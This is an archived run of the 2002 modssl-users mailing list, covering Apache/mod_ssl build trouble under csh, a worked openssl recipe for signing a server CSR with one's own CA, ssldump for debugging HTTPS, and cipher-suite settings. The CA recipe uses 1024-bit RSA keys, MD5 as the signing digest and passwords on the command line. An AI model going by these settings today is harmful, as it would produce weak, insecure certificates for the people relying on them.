11 Mar 2002 14:55:41 -0500 From: "Robin P. Blanchard" Organization: Georgia Center Information Technology X-Mailer: Mozilla 4.79 [en] (X11; U; FreeBSD 4.5-STABLE i386) X-Accept-Language: en MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Re: Post ./configure issue with BSD and apache_1.3.22 References: <200203111354.AA107282554@mail.joemagee.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Robin P. Blanchard" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users are you using a bourne shell? default root shell on fbsd isn't a bourne-style shell...why not use ports to accomplish all of this? why install another copy of openssl? anyways...all of your commands i believe would work if you simply switched to sh instead of (t)csh. > Now proceed with the following commands (Bourne-Shell syntax): > $ cd ../apache_1.3.22 > $ SSL_BASE=/path/to/openssl ./configure ... --enable-module=ssl > $ make > $ make certificate > $ make install > #------------------------------------------ > #Here is where the problem seems to occur: > #------------------------------------------ > snortsensor# cd ../apache_1.3.22 > snortsensor# SSL_BASE=../openssl-0.9.6b/ \ > ? ./configure --enable-module=ssl \ > ? --enable-module=so \ > ? --prefix=/usr/local/www/ > SSL_BASE=../openssl-0.9.6b/: Command not found. > > I also tryed typing in: > > SSL_BASE=../openssl-0.9.6b/ ./configure --enable-module=ssl --enable-module=so --prefix=/usr/local/www/ > SSL_BASE=../openssl-0.9.6b/: Command not found. -- ------------------------------------ Robin P. Blanchard IT Program Specialist Georgia Center for Continuing Ed. fon: 706.542.2404 fax: 706.542.6546 email: Robin_Blanchard@gactr.uga.edu ------------------------------------ ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Mar 12 14:16:05 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id OAA16625; Tue, 12 Mar 2002 14:15:10 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from gate1.de.deuba.com id OAA16607; Tue, 12 Mar 2002 14:14:26 +0100 (MET) Received: by gate1.de.deuba.com id OAA113534; Tue, 12 Mar 2002 14:14:16 +0100 Received: from Deutsche Bank Mail Backbone by ebn00pgh01.de.deuba.com id xmat09456; Tue, 12 Mar 2002 14:14:15 +0100 Received: from sdbo1001.db.com by imr3-e1.groga.eur.deuba.com id g2CDDe1J020378; Tue, 12 Mar 2002 14:13:41 +0100 (MET) Subject: Sign a server CSR with my own CA X-Priority: 3 (Normal) To: modssl-users@modssl.org From: "Markus Dallmann" Date: Tue, 12 Mar 2002 14:13:37 +0100 Message-ID: X-MIMETrack: Serialize by Router on sdbo1001/Eschborn/DeuBaInt/DeuBa(Release 5.0.8 |June 18, 2001) at 03/12/2002 02:13:40 PM MIME-Version: 1.0 Content-type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id OAA16621 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Markus Dallmann" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi, I'm using a win32 binary version of Perl 5.6.1, mod_perl 1.25 and Apache 1.3.20, which also includes the apache module mod_ssl (2.8.4-1.3.20) based on OpenSSL (0.9.6a). I created my own server CRT (passed some problems, e.g. redirect config file in openssl req, download missing openssl.cnf from www.modssl.org) and build my own CA. But now I have problems to sign the CRT with my own CA, because there is no sign.sh script for WinNT. I tried it with 'openssl ca' and go through several error messages (last was missing index.txt). Does anybody succeeded in this? Or has anybody another solution? kind regards Markus -- Diese E-Mail enthält vertrauliche und/oder rechtlich geschützte Informationen. Wenn Sie nicht der richtige Adressat sind oder diese E-Mail irrtümlich erhalten haben, informieren Sie bitte sofort den Absender und vernichten Sie diese Mail. Das unerlaubte Kopieren sowie die unbefugte Weitergabe dieser Mail ist nicht gestattet. This e-mail may contain confidential and/or privileged information. If you are not the intended recipient (or have received this e-mail in error) please notify the sender immediately and destroy this e-mail. Any unauthorized copying, disclosure or distribution of the material in this e-mail is strictly forbidden. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Mar 12 16:13:04 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id QAA20311; Tue, 12 Mar 2002 16:12:09 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mail4.nc.rr.com id QAA20307; Tue, 12 Mar 2002 16:11:39 +0100 (MET) Received: from gold.krumpli.com ([24.25.14.8]) by mail4.nc.rr.com with Microsoft SMTPSVC(5.5.1877.687.68); Tue, 12 Mar 2002 10:12:01 -0500 Received: from dino (dino.krumpli.com [192.168.10.1]) by gold.krumpli.com (8.11.6/8.11.6) with ESMTP id g2CFAsa92215 for ; Tue, 12 Mar 2002 10:10:55 -0500 (EST) (envelope-from tporter@dtool.com) From: "Thomas Porter, Ph.D." To: Subject: RE: Sign a server CSR with my own CA Date: Tue, 12 Mar 2002 10:11:28 -0500 Message-ID: <000201c1c9d8$2f0c51e0$010aa8c0@krumpli.com> MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook, Build 10.0.2616 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Importance: Normal In-Reply-To: Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id QAA20308 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Thomas Porter, Ph.D." X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Search for CA.pl -----Original Message----- From: owner-modssl-users@modssl.org [mailto:owner-modssl-users@modssl.org] On Behalf Of Markus Dallmann Sent: Tuesday, March 12, 2002 8:14 AM To: modssl-users@modssl.org Subject: Sign a server CSR with my own CA Hi, I'm using a win32 binary version of Perl 5.6.1, mod_perl 1.25 and Apache 1.3.20, which also includes the apache module mod_ssl (2.8.4-1.3.20) based on OpenSSL (0.9.6a). I created my own server CRT (passed some problems, e.g. redirect config file in openssl req, download missing openssl.cnf from www.modssl.org) and build my own CA. But now I have problems to sign the CRT with my own CA, because there is no sign.sh script for WinNT. I tried it with 'openssl ca' and go through several error messages (last was missing index.txt). Does anybody succeeded in this? Or has anybody another solution? kind regards Markus -- Diese E-Mail enthält vertrauliche und/oder rechtlich geschützte Informationen. Wenn Sie nicht der richtige Adressat sind oder diese E-Mail irrtümlich erhalten haben, informieren Sie bitte sofort den Absender und vernichten Sie diese Mail. Das unerlaubte Kopieren sowie die unbefugte Weitergabe dieser Mail ist nicht gestattet. This e-mail may contain confidential and/or privileged information. If you are not the intended recipient (or have received this e-mail in error) please notify the sender immediately and destroy this e-mail. Any unauthorized copying, disclosure or distribution of the material in this e-mail is strictly forbidden. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Mar 12 16:54:07 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id QAA21582; Tue, 12 Mar 2002 16:53:14 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from gate1.de.deuba.com id QAA21546; Tue, 12 Mar 2002 16:52:06 +0100 (MET) Received: by gate1.de.deuba.com id QAA100020; Tue, 12 Mar 2002 16:52:03 +0100 Received: from Deutsche Bank Mail Backbone by ebn00pgh01.de.deuba.com id xmam90156; Tue, 12 Mar 2002 16:52:01 +0100 Received: from sdbo1001.db.com by imr2-e1.esb.eur.deuba.com id g2CFpsO9023671; Tue, 12 Mar 2002 16:51:55 +0100 (MET) Subject: Antwort: RE: Sign a server CSR with my own CA X-Priority: 3 (Normal) To: modssl-users@modssl.org From: "Markus Dallmann" Date: Tue, 12 Mar 2002 16:51:52 +0100 Message-ID: X-MIMETrack: Serialize by Router on sdbo1001/Eschborn/DeuBaInt/DeuBa(Release 5.0.8 |June 18, 2001) at 03/12/2002 04:51:55 PM MIME-Version: 1.0 Content-type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id QAA21578 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Markus Dallmann" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Done, but nothing found. Datum: 12.03.2002 16:14 An: Antwort an: modssl-users@modssl.org Betreff: RE: Sign a server CSR with my own CA Nachrichtentext: Search for CA.pl -----Original Message----- From: owner-modssl-users@modssl.org [mailto:owner-modssl-users@modssl.org] On Behalf Of Markus Dallmann Sent: Tuesday, March 12, 2002 8:14 AM To: modssl-users@modssl.org Subject: Sign a server CSR with my own CA Hi, I'm using a win32 binary version of Perl 5.6.1, mod_perl 1.25 and Apache 1.3.20, which also includes the apache module mod_ssl (2.8.4-1.3.20) based on OpenSSL (0.9.6a). I created my own server CRT (passed some problems, e.g. redirect config file in openssl req, download missing openssl.cnf from www.modssl.org) and build my own CA. But now I have problems to sign the CRT with my own CA, because there is no sign.sh script for WinNT. I tried it with 'openssl ca' and go through several error messages (last was missing index.txt). Does anybody succeeded in this? Or has anybody another solution? kind regards Markus -- Diese E-Mail enthält vertrauliche und/oder rechtlich geschützte Informationen. Wenn Sie nicht der richtige Adressat sind oder diese E-Mail irrtümlich erhalten haben, informieren Sie bitte sofort den Absender und vernichten Sie diese Mail. Das unerlaubte Kopieren sowie die unbefugte Weitergabe dieser Mail ist nicht gestattet. This e-mail may contain confidential and/or privileged information. If you are not the intended recipient (or have received this e-mail in error) please notify the sender immediately and destroy this e-mail. Any unauthorized copying, disclosure or distribution of the material in this e-mail is strictly forbidden. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org -- Diese E-Mail enthält vertrauliche und/oder rechtlich geschützte Informationen. Wenn Sie nicht der richtige Adressat sind oder diese E-Mail irrtümlich erhalten haben, informieren Sie bitte sofort den Absender und vernichten Sie diese Mail. Das unerlaubte Kopieren sowie die unbefugte Weitergabe dieser Mail ist nicht gestattet. This e-mail may contain confidential and/or privileged information. If you are not the intended recipient (or have received this e-mail in error) please notify the sender immediately and destroy this e-mail. Any unauthorized copying, disclosure or distribution of the material in this e-mail is strictly forbidden. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Mar 12 19:19:04 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id TAA29418; Tue, 12 Mar 2002 19:18:12 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from hotmail.com id TAA29407; Tue, 12 Mar 2002 19:18:01 +0100 (MET) Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Tue, 12 Mar 2002 10:06:40 -0800 Received: from 156.153.255.243 by lw11fd.law11.hotmail.msn.com with HTTP; Tue, 12 Mar 2002 18:06:39 GMT X-Originating-IP: [156.153.255.243] From: "Edward Wong" To: modssl-users@modssl.org Subject: Re: Antwort: RE: Sign a server CSR with my own CA Date: Tue, 12 Mar 2002 10:06:39 -0800 Mime-Version: 1.0 Content-Type: text/plain; format=flowed Message-ID: X-OriginalArrivalTime: 12 Mar 2002 18:06:40.0443 (UTC) FILETIME=[A8CD10B0:01C1C9F0] Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Edward Wong" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Markus, It's a rather involved process, but here's what I did to get it to work. It's not the most elegant of methods, but it will get you started. 1) You'll need to generate your RSA keys for both your server and ca: -->openssl rand –out random_data 65000 -->openssl genrsa –passout pass:your_server_password –des3 -rand random_data -out server.key 1024 -->openssl genrsa –passout pass:your_ca_password –des3 –rand random_data -out ca.key 1024 2) Now create your CSR: -->openssl req -new –passin file:your_server_password –config cert.conf -key server.key -out server.csr Your "cert.conf" file should look something like: [ req ] default_keyfile = server.csr distinguished_name = req_distinguished_name prompt = no [ req_distinguished_name ] C = US ST = Califori.. uhh L = Palo-Alto O = Hewlett-Packard Co. OU = WJA emailAddress = your e-mail address CN = 123.123.123.123 3) Create a self-signed CA Certificate (X509 structure) with the RSA key of the CA (output will be PEM formatted) in ca.crt -->openssl req –new -x509 -passin pass:your_ca_password –config cert.conf -days 365 -key ca.key -out ca.crt 4) Have the new CA sign the server’s CSR and store results in server.crt. This is the tricky part. -->Create an empty file called "certIndex". -->Create a file called "certSerialNo", and put a "01" in it -->openssl ca –batch –passin pass:your_server_password –config ca.conf –out server.crt –infiles server.csr Your "ca.conf" file should look something like: [ ca ] default_ca = CA_default # The default ca section [ CA_default ] dir = c:/apache2/certificates/temp # top dir new_certs_dir = c:/apache2/certificates/temp # new certs dir database = c:/apache2/certificates/temp/certIndex # index file. serial = c:/apache2/certificates/temp/certSerialNo # serial no file RANDFILE = c:/apache2/certificates/temp/random_data # random number file certificate = c:/apache2/certificates/temp/ca.crt # The CA cert private_key = c:/apache2/certificates/temp/ca.key # CA private key default_days = 365 # how long to certify for default_crl_days= 30 # how long before next CRL default_md = md5 # md to use policy = policy_any # default policy [ policy_any ] localityName = supplied countryName = supplied stateOrProvinceName = supplied organizationName = supplied organizationalUnitName = supplied commonName = supplied emailAddress = optional That should do it. There are undoubtedly typo's in there somewhere. Good luck, Ed >From: "Markus Dallmann" >Reply-To: modssl-users@modssl.org >To: modssl-users@modssl.org >Subject: Antwort: RE: Sign a server CSR with my own CA >Date: Tue, 12 Mar 2002 16:51:52 +0100 > > >Done, but nothing found. > > >Datum: 12.03.2002 16:14 >An: > > > > >Antwort an: modssl-users@modssl.org > >Betreff: RE: Sign a server CSR with my own CA >Nachrichtentext: > >Search for CA.pl > >-----Original Message----- >From: owner-modssl-users@modssl.org >[mailto:owner-modssl-users@modssl.org] On Behalf Of Markus Dallmann >Sent: Tuesday, March 12, 2002 8:14 AM >To: modssl-users@modssl.org >Subject: Sign a server CSR with my own CA > > > >Hi, > >I'm using a win32 binary version of Perl 5.6.1, mod_perl 1.25 and Apache >1.3.20, which also includes the apache module mod_ssl (2.8.4-1.3.20) >based on OpenSSL (0.9.6a). > >I created my own server CRT (passed some problems, e.g. redirect config >file in openssl req, download missing openssl.cnf from www.modssl.org) >and build my own CA. > >But now I have problems to sign the CRT with my own CA, because there is >no sign.sh script for WinNT. I tried it with 'openssl ca' and go through >several error messages (last was missing index.txt). > >Does anybody succeeded in this? Or has anybody another solution? > >kind regards > >Markus > > >-- > >Diese E-Mail enthält vertrauliche und/oder rechtlich geschützte >Informationen. Wenn Sie nicht der richtige Adressat sind oder diese >E-Mail irrtümlich erhalten haben, informieren Sie bitte sofort den >Absender und vernichten Sie diese Mail. Das unerlaubte Kopieren sowie >die unbefugte Weitergabe dieser Mail ist nicht gestattet. > >This e-mail may contain confidential and/or privileged information. If >you are not the intended recipient (or have received this e-mail in >error) please notify the sender immediately and destroy this e-mail. Any >unauthorized copying, disclosure or distribution of the material in this >e-mail is strictly forbidden. > > >______________________________________________________________________ >Apache Interface to OpenSSL (mod_ssl) www.modssl.org >User Support Mailing List modssl-users@modssl.org >Automated List Manager majordomo@modssl.org > >______________________________________________________________________ >Apache Interface to OpenSSL (mod_ssl) www.modssl.org >User Support Mailing List modssl-users@modssl.org >Automated List Manager majordomo@modssl.org > > > > > >-- > >Diese E-Mail enthält vertrauliche und/oder rechtlich geschützte >Informationen. Wenn Sie nicht der richtige Adressat sind oder diese E-Mail >irrtümlich erhalten haben, informieren Sie bitte sofort den Absender und >vernichten Sie diese Mail. Das unerlaubte Kopieren sowie die unbefugte >Weitergabe dieser Mail ist nicht gestattet. > >This e-mail may contain confidential and/or privileged information. If you >are not the intended recipient (or have received this e-mail in error) >please notify the sender immediately and destroy this e-mail. Any >unauthorized copying, disclosure or distribution of the material in this >e-mail is strictly forbidden. > > >______________________________________________________________________ >Apache Interface to OpenSSL (mod_ssl) www.modssl.org >User Support Mailing List modssl-users@modssl.org >Automated List Manager majordomo@modssl. _________________________________________________________________ Join the world’s largest e-mail service with MSN Hotmail. http://www.hotmail.com ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Mar 12 21:37:29 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id VAA05427; Tue, 12 Mar 2002 21:36:13 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id VAA05393; Tue, 12 Mar 2002 21:35:32 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id 34A9C4CE716; Tue, 12 Mar 2002 21:35:32 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g2CKZ8l54012; Tue, 12 Mar 2002 21:35:08 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from vancouver.global-village.net id VAA04123; Tue, 12 Mar 2002 21:03:27 +0100 (MET) Received: from manila (aohs4boy1dg.bc.hsia.telus.net [64.180.111.121] (may be forged)) by vancouver.global-village.net (8.11.4/8.11.4) with SMTP id g2CK3Mm34780 (using TLSv1/SSLv3 with cipher RC4-MD5 (128 bits) verified NO) for ; Tue, 12 Mar 2002 12:03:25 -0800 Message-ID: <034101c1ca02$1cfb4860$370a0a0a@manila> From: "Pierre Carette" To: References: <1008698240.3697.97.camel@c1593933-a.boulder1.co.home.com> Subject: How to debug an https connection Date: Tue, 12 Mar 2002 12:11:33 -0800 Organization: Global Village Consulting Inc. MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Pierre Carette" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Is there a way to debug https connections with Apache+Mod_SSL? We have som compatibility issue with IE and our web application. We'd like to know what's going on at a lower level but everything is encrypted, Thanks, Pierre ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Mar 13 00:39:20 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id AAA16364; Wed, 13 Mar 2002 00:38:22 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mail7.nc.rr.com id AAA16340; Wed, 13 Mar 2002 00:37:55 +0100 (MET) Received: from gold.krumpli.com ([24.25.14.8]) by mail7.nc.rr.com with Microsoft SMTPSVC(5.5.1877.687.68); Tue, 12 Mar 2002 18:36:33 -0500 Received: from dino (dino.krumpli.com [192.168.10.1]) by gold.krumpli.com (8.11.6/8.11.6) with ESMTP id g2CNZwa93052 for ; Tue, 12 Mar 2002 18:35:58 -0500 (EST) (envelope-from tporter@dtool.com) From: "Thomas Porter, Ph.D." To: Subject: RE: How to debug an https connection Date: Tue, 12 Mar 2002 18:36:33 -0500 Message-ID: <001501c1ca1e$bee51b80$010aa8c0@krumpli.com> MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook, Build 10.0.2616 Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 In-Reply-To: <034101c1ca02$1cfb4860$370a0a0a@manila> Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Thomas Porter, Ph.D." X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users You can sniff traffic using ssldump. URL below. In addition, turn up your debug on your SSLEngine & monitor your logs http://www.rtfm.com/ssldump/ Best.. Thomas Porter, Ph.D. ScorpionPoint Security -----Original Message----- From: owner-modssl-users@modssl.org [mailto:owner-modssl-users@modssl.org] On Behalf Of Pierre Carette Sent: Tuesday, March 12, 2002 3:12 PM To: modssl-users@modssl.org Subject: How to debug an https connection Is there a way to debug https connections with Apache+Mod_SSL? We have som compatibility issue with IE and our web application. We'd like to know what's going on at a lower level but everything is encrypted, Thanks, Pierre ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Mar 13 09:41:05 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id JAA10116; Wed, 13 Mar 2002 09:40:14 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from agora.rdrop.com id JAA10084; Wed, 13 Mar 2002 09:39:23 +0100 (MET) Received: (from alan@localhost) by agora.rdrop.com (8.11.4/8.11.4) id g2D8dL702583 for modssl-users@modssl.org; Wed, 13 Mar 2002 00:39:21 -0800 (PST) (envelope-from alan) Date: Wed, 13 Mar 2002 00:39:21 -0800 From: Alan Batie To: modssl-users@modssl.org Subject: SSLCipherSuite Message-ID: <20020313003921.A463@agora.rdrop.com> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="cNdxnHkX5QqsyA0e" Content-Disposition: inline User-Agent: Mutt/1.3.22.1i Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Alan Batie X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users --cNdxnHkX5QqsyA0e Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable What is the magic incantation to convince SSLCipherSuite to only use secure methods? I tried these and it let low grade through just fine: SSLCipherSuite ALL:!ADH:!LOW:RC4+RSA:+HIGH:+MEDIUM:+SSLv2 SSLCipherSuite ALL:!ADH:!LOW:RC4+RSA:+HIGH:+MEDIUM SSLCipherSuite !ADH:!LOW:RC4+RSA:+HIGH:+MEDIUM:ALL SSLCipherSuite !ADH:!LOW:RC4+RSA:+HIGH:+MEDIUM I tried these and nothing worked: SSLCipherSuite !ALL:RC4+RSA:+HIGH:+MEDIUM SSLCipherSuite RC4+RSA:+HIGH:+MEDIUM:!ALL So I'm at a complete loss as to how to force clients to use good encryption... --=20 Alan Batie ______ www.rdrop.com/users/alan Me alan@batie.org \ / www.qrd.org The Triangle PGPFP DE 3C 29 17 C0 49 7A \ / www.pgpi.com The Weird Numbers 27 40 A5 3C 37 4A DA 52 B9 \/ razor.sourceforge.net NO SPAM! "They that give up essential liberty to obtain temporary safety,=20 deserve neither liberty nor safety." (Ben Franklin) --cNdxnHkX5QqsyA0e Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iQCVAwUBPI8QOIv4wNua7QglAQGmKgP+JrEUqo8KArDWV5pdN0RyiP+8E2Sz4adc U3lLX1KuhoMjW/gIge2QydTmkTgvjcMt3U3ftGbuIaoIbuZwTdUkmgIh3in2OK/W zGyb7qYEdJkD79WnOC3Xel4g+D1hLLY0y+ofVXq4HQx6+yOXa3iixBVD3rzoGd6p e5IwI1YKs9c= =HT6x -----END PGP SIGNATURE----- --cNdxnHkX5QqsyA0e-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Mar 13 11:54:06 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id LAA16683; Wed, 13 Mar 2002 11:53:12 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from gate0.de.deuba.com id LAA16669; Wed, 13 Mar 2002 11:52:21 +0100 (MET) Received: by gate0.de.deuba.com id LAA114526; Wed, 13 Mar 2002 11:52:08 +0100 Received: from Deutsche Bank Mail Backbone by ebn00pgh00.de.deuba.com id xmaib2528; Wed, 13 Mar 2002 11:52:02 +0100 Received: from sdbo1001.db.com by imr3-e1.groga.eur.deuba.com id g2DApE1J017987; Wed, 13 Mar 2002 11:51:14 +0100 (MET) Subject: Antwort: Re: Antwort: RE: Sign a server CSR with my own CA X-Priority: 3 (Normal) To: modssl-users@modssl.org From: "Markus Dallmann" Date: Wed, 13 Mar 2002 11:51:10 +0100 Message-ID: X-MIMETrack: Serialize by Router on sdbo1001/Eschborn/DeuBaInt/DeuBa(Release 5.0.8 |June 18, 2001) at 03/13/2002 11:51:14 AM MIME-Version: 1.0 Content-type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id LAA16679 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Markus Dallmann" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi Ed, works fine! Many thanks Markus PS: Only one typo, I corrected below for others convenience. Datum: 12.03.2002 19:20 An: modssl-users@modssl.org Antwort an: modssl-users@modssl.org Betreff: Re: Antwort: RE: Sign a server CSR with my own CA Nachrichtentext: Markus, It's a rather involved process, but here's what I did to get it to work. It's not the most elegant of methods, but it will get you started. 1) You'll need to generate your RSA keys for both your server and ca: -->openssl rand -out random_data 65000 -->openssl genrsa -passout pass:your_server_password -des3 -rand random_data -out server.key 1024 -->openssl genrsa -passout pass:your_ca_password -des3 -rand random_data -out ca.key 1024 2) Now create your CSR: -->openssl req -new -passin (strikethrough: file)pass:your_server_password -config cert.conf -key server.key -out server.csr Your "cert.conf" file should look something like: [ req ] default_keyfile = server.csr distinguished_name = req_distinguished_name prompt = no [ req_distinguished_name ] C = US ST = Califori.. uhh L = Palo-Alto O = Hewlett-Packard Co. OU = WJA emailAddress = your e-mail address CN = 123.123.123.123 3) Create a self-signed CA Certificate (X509 structure) with the RSA key of the CA (output will be PEM formatted) in ca.crt -->openssl req -new -x509 -passin pass:your_ca_password -config cert.conf -days 365 -key ca.key -out ca.crt 4) Have the new CA sign the server's CSR and store results in server.crt. This is the tricky part. -->Create an empty file called "certIndex". -->Create a file called "certSerialNo", and put a "01" in it -->openssl ca -batch -passin pass:your_server_password -config ca.conf -out server.crt -infiles server.csr Your "ca.conf" file should look something like: [ ca ] default_ca = CA_default # The default ca section [ CA_default ] dir = c:/apache2/certificates/temp # top dir new_certs_dir = c:/apache2/certificates/temp # new certs dir database = c:/apache2/certificates/temp/certIndex # index file. serial = c:/apache2/certificates/temp/certSerialNo # serial no file RANDFILE = c:/apache2/certificates/temp/random_data # random number file certificate = c:/apache2/certificates/temp/ca.crt # The CA cert private_key = c:/apache2/certificates/temp/ca.key # CA private key default_days = 365 # how long to certify for default_crl_days= 30 # how long before next CRL default_md = md5 # md to use policy = policy_any # default policy [ policy_any ] localityName = supplied countryName = supplied stateOrProvinceName = supplied organizationName = supplied organizationalUnitName = supplied commonName = supplied emailAddress = optional That should do it. There are undoubtedly typo's in there somewhere. Good luck, Ed >From: "Markus Dallmann" >Reply-To: modssl-users@modssl.org >To: modssl-users@modssl.org >Subject: Antwort: RE: Sign a server CSR with my own CA >Date: Tue, 12 Mar 2002 16:51:52 +0100 > > >Done, but nothing found. > > >Datum: 12.03.2002 16:14 >An: > > > > >Antwort an: modssl-users@modssl.org > >Betreff: RE: Sign a server CSR with my own CA >Nachrichtentext: > >Search for CA.pl > >-----Original Message----- >From: owner-modssl-users@modssl.org >[mailto:owner-modssl-users@modssl.org] On Behalf Of Markus Dallmann >Sent: Tuesday, March 12, 2002 8:14 AM >To: modssl-users@modssl.org >Subject: Sign a server CSR with my own CA > > > >Hi, > >I'm using a win32 binary version of Perl 5.6.1, mod_perl 1.25 and Apache >1.3.20, which also includes the apache module mod_ssl (2.8.4-1.3.20) >based on OpenSSL (0.9.6a). > >I created my own server CRT (passed some problems, e.g. redirect config >file in openssl req, download missing openssl.cnf from www.modssl.org) >and build my own CA. > >But now I have problems to sign the CRT with my own CA, because there is >no sign.sh script for WinNT. I tried it with 'openssl ca' and go through >several error messages (last was missing index.txt). > >Does anybody succeeded in this? Or has anybody another solution? > >kind regards > >Markus > > >-- > >Diese E-Mail enthält vertrauliche und/oder rechtlich geschützte >Informationen. Wenn Sie nicht der richtige Adressat sind oder diese >E-Mail irrtümlich erhalten haben, informieren Sie bitte sofort den >Absender und vernichten Sie diese Mail. Das unerlaubte Kopieren sowie >die unbefugte Weitergabe dieser Mail ist nicht gestattet. > >This e-mail may contain confidential and/or privileged information. If >you are not the intended recipient (or have received this e-mail in >error) please notify the sender immediately and destroy this e-mail. Any 